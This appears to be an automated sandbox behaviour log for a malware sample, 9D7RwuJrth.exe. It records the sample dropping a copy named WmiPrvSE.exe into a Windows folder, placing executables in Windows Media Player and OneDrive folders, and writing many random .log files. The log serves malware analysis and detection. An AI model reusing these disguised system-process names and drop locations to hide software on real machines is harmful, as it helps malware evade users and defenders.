Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\KSAetdQl.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\lHCBdANz.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\qQwaFPUc.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\JdPmuXvO.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\ZOCRVjRy.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\iEOtPIrO.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\seyqUCWq.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\jwQjNADO.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\KMHfZCnD.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\AddxSDXD.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\FDIxLbbR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\mUfaJIkR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\decjNzkA.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\gUkCADyL.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\CDLiAAVt.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\Hwddojgi.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ocsSTCYe.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\eJEjcPHs.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\HoTXnYtt.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\mRnsAsGv.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\STgXZIan.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\eoNbkqdw.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\wipYxcGI.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\AEgOhmic.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\eNYCHMrV.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\DCtffNkc.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\kChIFuMg.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Program Files\Windows Media Player\en-GB\qLBhpsNtheWbwIdhOeZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\OzPMecrY.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\niPqzeHY.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\qpMzVwBT.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\OIrVAZQe.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\jFPSHRJE.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\hyUuvhPg.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\yCtrFDQY.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\JUqyElOI.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\Default\OneDrive\qLBhpsNtheWbwIdhOeZ.exe	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\bXhLAPqc.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\LALnLPjB.log	Jump to dropped file

Source: C:\Users\user\Desktop\9D7RwuJrth.exe

File created: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe

Jump to dropped file

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\OzPMecrY.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\vhcgKXhJ.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\dVAarBMu.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\JENuXwBf.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\AVufnTwx.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\rrlpDagQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\jOdAThRi.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\gxIrOcDq.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\QnTUQpnW.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\eJEjcPHs.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\COJNZQhv.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\kChIFuMg.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\ZOCRVjRy.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\QfjBlGMR.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\AddxSDXD.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\quKhiaRV.log	Jump to dropped file
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File created: C:\Users\user\Desktop\YiicOEwG.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\QJwUIRwB.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\cvCSNcGe.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\TMiCdAAw.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\JdPmuXvO.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\zuvWKvqh.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\infrqIKS.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ZELbGgFk.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\OQhlWUKC.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\xJQGDhfo.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\dsdajcUY.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\DCtffNkc.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\sOOpvBpu.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\bHyKcPKg.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\IpLeIKzQ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\xBgoYyEi.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\pdjZooeB.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\guQJELZU.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\XOCTRFXH.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ZRpBnocC.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\RngMDvMV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\HENwTSHn.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\yWtgjqCG.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\niPqzeHY.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\XgJlfaRK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\MsfvwPWb.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\CJLfMmRu.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\jrYzshHe.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\RfxtYLmQ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\Hwddojgi.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\qpMzVwBT.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\XYaTBrrE.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\GQJohFLp.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\wipYxcGI.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\nzWIOABa.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\OLjDJquB.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\lkUrzNzM.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\iayrzvUL.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\SYsmfrex.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\JpYWvPZP.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\zHFGLnTh.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\oTbQbbYz.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\fkHAryTS.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\OdqVYMoD.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\DpMeoAtV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\czckklIZ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\LsLFRydK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\AEgOhmic.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\jwQjNADO.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\aOwTdXyg.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\QfdDtvsy.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\HBUOKBdR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\decjNzkA.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\KSAetdQl.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\tLkzZqkX.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\kcQjpOfp.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\QLdDWJUZ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\xtqXCEKK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\gmasiRfw.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\MPcmOdeg.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\uILHvqzR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\lZsrLOuk.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\brYbblpC.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\XujdOCGR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\haeBUeau.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\YrKlkCVM.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\OIrVAZQe.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\GfifQgAx.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\nSHawKfi.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\imHaAnxM.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\cLlTmcma.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\TideCjWs.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\RXHdCRrs.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\IonNSomK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\smiIylww.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\iEOtPIrO.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\XQkCfxwg.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\FDIxLbbR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\vVohbyWj.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\eNYCHMrV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\VfEmYjln.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\KrawoXqF.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\seyqUCWq.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\bXhLAPqc.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\RoOvQmlu.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\HGufhKgM.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\qQwaFPUc.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\BwryKsoE.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\rNXibPjW.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ijPsrWTp.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\YvkCHKYH.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\HoTXnYtt.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ocsSTCYe.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\eoNbkqdw.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\NhwwQEyh.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\tPKQwznS.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\cItldMID.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\RUOvtANV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ANxQZOiH.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\gqAKFZhr.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\NZNelUXb.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\EvEoCbHu.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\uMlYSzCN.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\gGCbQipO.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\MFWOLyZB.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\LALnLPjB.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\BRrXbneT.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\tojirtOm.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\jFPSHRJE.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ZWwCXoEW.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\JUqyElOI.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\zgMHUZTa.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\gUkCADyL.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\YqcMQKie.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\wvgrNMIh.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\lHCBdANz.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\UAlWJNil.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\KMHfZCnD.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\BjyqpIYV.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\rAfaFgSo.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ywOZehbx.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\SFRmUDLH.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\CDLiAAVt.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\sUsSQXQL.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\qKWRQFlK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ZDFmwSFw.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\OPbwNHKO.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\yNVrtDVA.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\mUfaJIkR.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\VNPvpVFD.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\CvcPWQun.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\kjAKCvZY.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\TcjfiIuK.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\HiuOyNKb.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\rgoKfKUN.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\hyUuvhPg.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\fnytvPjf.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\kWkcJscF.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\kOAKeIBA.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\aghuugwS.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\KebpbcGE.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\ITFobKbD.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\rMoKHXwo.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\hdVuXvrH.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\XprDnjwZ.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\xFRjkDBd.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\mRnsAsGv.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\MbDxwcVz.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\rEFrcoVj.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\STgXZIan.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\yCtrFDQY.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\oOOAVsVq.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\fkGLlyFI.log	Jump to dropped file
Source: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	File created: C:\Users\user\Desktop\VBmvCWAb.log	Jump to dropped file

Source: C:\Windows\System32\wbem\WMIADAP.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WmiApRpl\Performance

Source: C:\Windows\System32\wbem\WMIADAP.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance Performance Data

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
